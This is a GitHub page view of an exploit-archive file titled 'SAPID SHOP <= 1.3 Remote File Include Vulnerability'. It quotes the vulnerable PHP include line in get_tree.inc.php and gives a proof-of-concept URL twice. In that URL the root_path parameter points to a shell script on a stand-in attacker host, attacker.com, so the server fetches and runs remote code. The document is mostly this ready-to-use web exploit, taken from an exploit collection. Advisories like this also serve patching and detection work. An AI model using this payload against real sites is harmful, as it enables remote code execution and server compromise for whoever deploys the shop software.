forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10067.txt
28 lines (24 loc) · 1.17 KB
/
10067.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
SAPID SHOP <= 1.3 Remote File Include Vulnerability
===================================================
#Download Script : http://sourceforge.net/projects/sapid/files
########################################################################
#
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
# <?php
# require $forms_dir."calmenuform.php"; if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
# ?>
#
#PoC : http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
#
########################################################################
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
# <?php
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
# ?>
#
#PoC : http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
########################################################################